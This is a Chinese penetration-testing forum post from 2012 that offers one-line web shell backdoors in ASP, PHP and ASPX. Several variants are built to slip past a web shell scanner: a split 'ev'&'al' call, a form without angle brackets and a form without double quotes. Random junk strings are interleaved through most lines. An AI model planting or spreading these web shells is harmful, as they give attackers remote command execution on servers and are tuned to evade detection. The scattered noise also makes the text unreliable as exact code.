中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]

作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  3 U' f5 l& @$ d1 F
5 Y6 q/ n& j+ B$ R7 K3 r
php一句话  <?php eval($_POST[1]);?>  5 n2 O9 I6 d6 d/ {/ X" |1 w
+ ~* S# V* Z0 p) ?
aspx一句话
0 ?+ s  p. b" N7 V% Q
. Z; o$ \) G6 f- O8 k& i<script language="C#" runat="server">4 s+ w# ?' u, i% R$ T

! i6 m4 K! ~" m, g. WWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");
! p/ n/ v4 C( {& e8 G2 X) F) o( x* f7 k" ?# O# S; S
</script>
4 @' G: g: ]1 t
# d4 G1 n- F* }3 W可以躲过雷客图的一句话。& p& f/ x+ N* V3 U9 _; p- x. {
0 [$ Z" H' ~5 P! ?
  <%
; c; r! M; z8 Q" U# `7 t5 K3 t" s0 G; G& t2 K8 x" Y, |7 g6 T/ I
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")- C, W3 P( O: }( s: _" M! T

- O7 |8 }+ p/ A6 F! e9 T  ms.Language="VBScript"0 N& T0 T; \4 E- q6 p

4 A7 S4 |$ w; X1 Q) g  ms.AddObject "Response", Response
$ m. z! d6 Z1 m9 z0 n" o
% b3 y4 N8 K& ^5 b3 }  ms.AddObject "request", request
, ]% p' g* G$ ?: P# s) W# f0 E4 t7 |9 a' J
  ms.ExecuteStatement("ev"&"al(request(""1""))")
% D' @7 s% D# `; K4 P# T, E% o8 l0 _: r$ `4 w/ F/ Y3 |
  %>
, P* c5 W# g' ~3 F/ ^
" v9 A3 f$ Q9 r0 k1 U4 D  不用'<,>'的asp一句话8 \9 H0 c9 N( H- k6 ?" ~! `! ^

2 a& G) B$ G& }" U* o$ ~  <script language=VBScript runat=server>execute request("1")</script>; p3 W. {) [# r8 B2 x$ s

, L* b0 v- Q% \7 c4 B  不用双引号的一句话。
+ t. `0 F& i1 ^1 d/ y4 t* o
3 V$ {& H; Y: V2 h  <%eval request(chr(35))%>) Y, A" M5 k& B( ~$ v% S* W





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2